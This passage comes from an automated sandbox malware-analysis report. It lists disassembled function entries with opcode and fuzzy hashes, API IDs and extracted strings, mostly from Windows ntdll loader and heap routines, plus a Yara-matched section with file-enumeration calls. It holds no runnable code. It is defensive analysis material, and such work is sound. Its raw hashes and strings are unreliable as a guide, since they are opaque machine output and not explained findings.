                                                                      • Instruction Fuzzy Hash: F751E136E10358ABDB08EFA8CC64E9D7BB6AB40348F150165EA40BF296DB749C51CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                      • API String ID: 3446177414-3224558752
                                                                      • Opcode ID: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
                                                                      • Instruction ID: e5cfa9f0cb438e858c6dbc1437567b120c6cd87c608e8c4361352d23e041b0dd
                                                                      • Opcode Fuzzy Hash: efbdf8ebd6b1670b6b3f99cc7d80324e8f6ab4a1f82cd363beb0e1b352e23106
                                                                      • Instruction Fuzzy Hash: B6412674A14760DFE712DF24C954B6ABBB8FF403A4F2085A9D90557281CB78D980DF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • ---------------------------------------, xrefs: 36B8EDF9
                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 36B8EDE3
                                                                      • Entry Heap Size , xrefs: 36B8EDED
                                                                      • HEAP: , xrefs: 36B8ECDD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                      • API String ID: 3446177414-1102453626
                                                                      • Opcode ID: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
                                                                      • Instruction ID: 20b9591cc1edc67406449172401c7e22e71e7a1a25065c77777b1132c69857bf
                                                                      • Opcode Fuzzy Hash: cf3162690479afd73e16276cfeaee8e345a90f1897df5abe09332111e784a243
                                                                      • Instruction Fuzzy Hash: 17418D79E10262DFC704CF14C9A0959BBB6FF853947258069D504AF221DB31EC43CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                      • API String ID: 3446177414-1222099010
                                                                      • Opcode ID: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
                                                                      • Instruction ID: 406ee50daa462f4954e30db7c1834d908338c91075069e0150d60db248b1664b
                                                                      • Opcode Fuzzy Hash: a2aa23e6af043cfc70012c291f81dc25b1483e72a8c8b9ae24a7f23b4a2a507d
                                                                      • Instruction Fuzzy Hash: 6A3141759107A4AFEB12DB24C818F697FF8FF01694F004889E8014B6A1CB69E940CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $$@
                                                                      • API String ID: 3446177414-1194432280
                                                                      • Opcode ID: 55947e1b892933edf373ebe5eaf8e770ca7e1ad5687f7079ab0f0501d3bef93f
                                                                      • Instruction ID: b5a47d8e6f9a520d09c8bc438c123b8bb7d7453aa1a1671ee8e7468bbf69ff3b
                                                                      • Opcode Fuzzy Hash: 55947e1b892933edf373ebe5eaf8e770ca7e1ad5687f7079ab0f0501d3bef93f
                                                                      • Instruction Fuzzy Hash: 5B8139B1D002699BDB22DF54CC44BDEB7B8AF08750F0041EAEA09B7240E7709E85DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36B53439
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 36B5344A, 36B53476
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 36B53466
                                                                      • LdrpFindDllActivationContext, xrefs: 36B53440, 36B5346C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 3446177414-3779518884
                                                                      • Opcode ID: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
                                                                      • Instruction ID: 9f5e1324d58866f088d87fed2a8a29e414cf559422beddd71f0118e96bbd3e8b
                                                                      • Opcode Fuzzy Hash: 8a487727bd23e2e7a82d76ccdb2ed4f2b04127cf25f3f016c88792f62b4ea991
                                                                      • Instruction Fuzzy Hash: F23119BAD00371BFFB119B05C884A56B6A4FB013D8F529166DA0467151E7A59CC8CFF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • LdrpDynamicShimModule, xrefs: 36B4A7A5
                                                                      • apphelp.dll, xrefs: 36B02382
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36B4A79F
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B4A7AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-176724104
                                                                      • Opcode ID: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
                                                                      • Instruction ID: ead2f91d8c868822e677be7235e15d125a1246fdea11346df405e9836257680d
                                                                      • Opcode Fuzzy Hash: 9b061c3066e65554ac11fd9a55debfb5638b2bef0e40051e565791883713a41f
                                                                      • Instruction Fuzzy Hash: 2E316B76E00250EFF721AF19CC91E597BB6FB85744F240059EA00BB255EBB99C42DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 3446177414-3610490719
                                                                      • Opcode ID: 56a83fc848b1d0a469113c8aa41db632e0db63452b0bdbd6a33f8e5d639446ba
                                                                      • Instruction ID: 4f5a53ffd06ee4c698407b39568aff0d9117c1e07f5142619eb0a28cfe08fa21
                                                                      • Opcode Fuzzy Hash: 56a83fc848b1d0a469113c8aa41db632e0db63452b0bdbd6a33f8e5d639446ba
                                                                      • Instruction Fuzzy Hash: 4F91FE71B05760AFE315CF24CDB4B6BB7A9FF84A44F21045AED449B281DB34E842CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 36B49F1C
                                                                      • LdrpCheckModule, xrefs: 36B49F24
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B49F2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-161242083
                                                                      • Opcode ID: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
                                                                      • Instruction ID: 2f3b1077676b0e0147c6ad089497e6322c2aa306a2a9ff8cb4a0fbb61887dfd9
                                                                      • Opcode Fuzzy Hash: 894f2972a442a3346fc8d7b0da16e1a2f01e880fc1cc7a46c98f3233ea75aec1
                                                                      • Instruction Fuzzy Hash: 9071E175E102159FEB05EF68C990AAEBBF5FB44308F144069E905EB251E734AD42CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $File
                                                                      • API String ID: 3446177414-2412145507
                                                                      • Opcode ID: 8d95f6efa31b43bf57e4ef5524226a36c77670fd4f82e1755b28055e20b668cd
                                                                      • Instruction ID: c2a1476d5c8ec2b7c55ee2d647f2eb02a3edb34e1eb75cdc4a2de4cc1968272e
                                                                      • Opcode Fuzzy Hash: 8d95f6efa31b43bf57e4ef5524226a36c77670fd4f82e1755b28055e20b668cd
                                                                      • Instruction Fuzzy Hash: 20619E71A1022DAFDF268B25CC51FE977F9AB48700F4041E9A54AE7181DB709F84CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 36B580E9
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 36B580F3
                                                                      • Failed to reallocate the system dirs string !, xrefs: 36B580E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 3446177414-1783798831
                                                                      • Opcode ID: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
                                                                      • Instruction ID: 0f0fa455bf6fe8b8c80cbe74fb1d02bbb02086e269a4ce47bad82c7050c1ff21
                                                                      • Opcode Fuzzy Hash: 85aed5869689088010ca49cfa8aeed2aa79cd51325425ebaaff0e5ced4958555
                                                                      • Instruction Fuzzy Hash: B741F0B5914324ABD710EF64CD51F9B7BF9EB45750F01582ABA48EB290EB38D801CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 36B64519
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36B64508
                                                                      • LdrpCheckRedirection, xrefs: 36B6450F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 3446177414-3154609507
                                                                      • Opcode ID: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
                                                                      • Instruction ID: 79765938d6b5d6cedca6f04dc300f585f4aa8f2bc13471d37578c2bb85f66aba
                                                                      • Opcode Fuzzy Hash: a0e6d3c4193293488d6e49d41de3c34837c0a5c4ded23b7cab5b6558d0c4dd0f
                                                                      • Instruction Fuzzy Hash: 6B410176A04B219BDB10CF6BC841A1677E4FF48798F058659ED88EB211DF70E800CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: Wow64 Emulation Layer
                                                                      • API String ID: 3446177414-921169906
                                                                      • Opcode ID: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
                                                                      • Instruction ID: ba556baf58884f42b5c6bafb0c999281742edc672f99b069803a1bc320083f20
                                                                      • Opcode Fuzzy Hash: 68450a560aa3f9503adfd21c35f10cc497b315c1cba57950791eb82eec73a1ac
                                                                      • Instruction Fuzzy Hash: 2721F97690011EBFAF01AAA28D84DFFBF7DEF45699B440054FE02A6101E635EE11DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 58dff58cbf817e90b44692bd79008522d8935062181c183a1b4f3dd5ea8db9e6
                                                                      • Instruction ID: 1ca1be56a8a854a099d8e76e3f24e733ff326bf771675562a2e8e83696e71086
                                                                      • Opcode Fuzzy Hash: 58dff58cbf817e90b44692bd79008522d8935062181c183a1b4f3dd5ea8db9e6
                                                                      • Instruction Fuzzy Hash: 0BE15D71E00319AFEF10CFA5C894BAEBBB9EF04354F20412AE955EB280D7709A45CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
                                                                      • Instruction ID: 8e3205c8e995bf16edf0c8a10b1323eff714ca75cc16c4f599bab60151969d39
                                                                      • Opcode Fuzzy Hash: 60da533331051b2c82f27cb5d3876fb285af0ff54ffb4b53f5efe16f7fb7b6b8
                                                                      • Instruction Fuzzy Hash: 9BE1DFB4E10228DFEB25CFA9C980A9DBFF9FF48344F20552AE955A7220D771A841CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
                                                                      • Instruction ID: 165d9d982b164a9219f5dc5c942f9a28e526d040196e69fb4b3542f497166acf
                                                                      • Opcode Fuzzy Hash: b41a7ae8cf1442d040dd37fa026155824206577691b7c669b11929b8445502c7
                                                                      • Instruction Fuzzy Hash: 21514A74F10632DFEF48CE19C8A0A29BBE6FB8A354B644169D506DB750DBB5AC41CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID:
                                                                      • API String ID: 3446177414-0
                                                                      • Opcode ID: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
                                                                      • Instruction ID: 3955a86f710b8a8a7e054e93b98f635677e98594522c17322d2b972c0592b8ce
                                                                      • Opcode Fuzzy Hash: 47c7c82798cc070a1cef0c0659f86ca88942b5aa8ec157355bc742f4a0fefaa4
                                                                      • Instruction Fuzzy Hash: 945135B5E102299FEF04CF95D844ADDBBB6FF48354F16802AEA05BB250DB349902CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                      • String ID:
                                                                      • API String ID: 4281723722-0
                                                                      • Opcode ID: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
                                                                      • Instruction ID: d5c1e897fe005e97b15c44f0e2df1a308982b0cf8886e23ff59438a2d0a73895
                                                                      • Opcode Fuzzy Hash: 4d149c70221ec37620b690cd5772188287da4726021f9b8c79d73614ebb1ed25
                                                                      • Instruction Fuzzy Hash: 21312775E01228EFCF05DFA9D854A9DBBF1FB48320F10416AEA11BB280DB395901CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4a1ea342ed20c6f8edfde7d643959586c4c78336c99fcad6c4bece8361894edf
                                                                      • Instruction ID: 940a8b9455095e20635429fc44fa6698664d1bc72d5a4730ce01a421955155b9
                                                                      • Opcode Fuzzy Hash: 4a1ea342ed20c6f8edfde7d643959586c4c78336c99fcad6c4bece8361894edf
                                                                      • Instruction Fuzzy Hash: 05322474D14269DFEB21CF64C984BD9BBB0BF08304F1041E9D949AB241EB769A84DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • kLsE, xrefs: 36AE05FE
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36AE0586
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 3446177414-2547482624
                                                                      • Opcode ID: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
                                                                      • Instruction ID: 007f86608d52b18dbdc18dc7205aa0f623e4de49f29cf39ddd03ecf206b9e908
                                                                      • Opcode Fuzzy Hash: b4897158580748721cd89b9d3dd8ace95f4fda971454629e27c5e592c7b420ad
                                                                      • Instruction Fuzzy Hash: 5D51DFB5A00706DFEB10DFA5C8807ABB7F8AF44304F10853ED9999B240EB749555DFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: 0$0
                                                                      • API String ID: 3446177414-203156872
                                                                      • Opcode ID: cc2cc30ba9d1e169cedb4910a2ba6d442316c67b2e16e6036a992ea88c9163a1
                                                                      • Instruction ID: 2cc1e9a04ed4e88e0e14ae047a9dcec138a81e282797c5111ca12782025323b6
                                                                      • Opcode Fuzzy Hash: cc2cc30ba9d1e169cedb4910a2ba6d442316c67b2e16e6036a992ea88c9163a1
                                                                      • Instruction Fuzzy Hash: 164139B5A087019FD300CF28C954A5ABBE5BF8C354F144A6EF988DB240D771EA05CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.7%
                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                      Signature Coverage:0.7%
                                                                      Total number of Nodes:453
                                                                      Total number of Limit Nodes:77

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$"$$$%z$&!$-7$.$8/$:$:$@D$Nr$O$U$UF$X$XW$[$^U$_q$b$c;$f$l$n$p$tK$u$z$|$|
                                                                      • API String ID: 0-966926751
                                                                      • Opcode ID: ccc1cd6ab63397257da40c39b27d3e1671cd5b5f73d992f6c1cdb89d84a220f8
                                                                      • Instruction ID: 6492cba0d51bb7f822a61c81cd2e61c94269fb3b85fee91f5086417fa1047e77
                                                                      • Opcode Fuzzy Hash: ccc1cd6ab63397257da40c39b27d3e1671cd5b5f73d992f6c1cdb89d84a220f8
                                                                      • Instruction Fuzzy Hash: 1632A1B0E05229CFEB24CF45C954BEDBBB2BB45308F2081D9D14D6B291CBB95A89CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FDB8F4
                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02FDB92F
                                                                      • FindClose.KERNELBASE(?), ref: 02FDB93A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2fc0000_write.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 21e005875b0c7b932f36bbc9dbccd5be1e402712fafd25961653530f9913b36f
                                                                      • Instruction ID: bcfdf1a201a043482a2bb1d7d333b66ae74b14f4f782556cc4a561deb9c5a09d
                                                                      • Opcode Fuzzy Hash: 21e005875b0c7b932f36bbc9dbccd5be1e402712fafd25961653530f9913b36f
                                                                      • Instruction Fuzzy Hash: A13190B19002497BDB20EFA4CD95FFF777D9F44788F244458BA09A7180DA70AA84CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
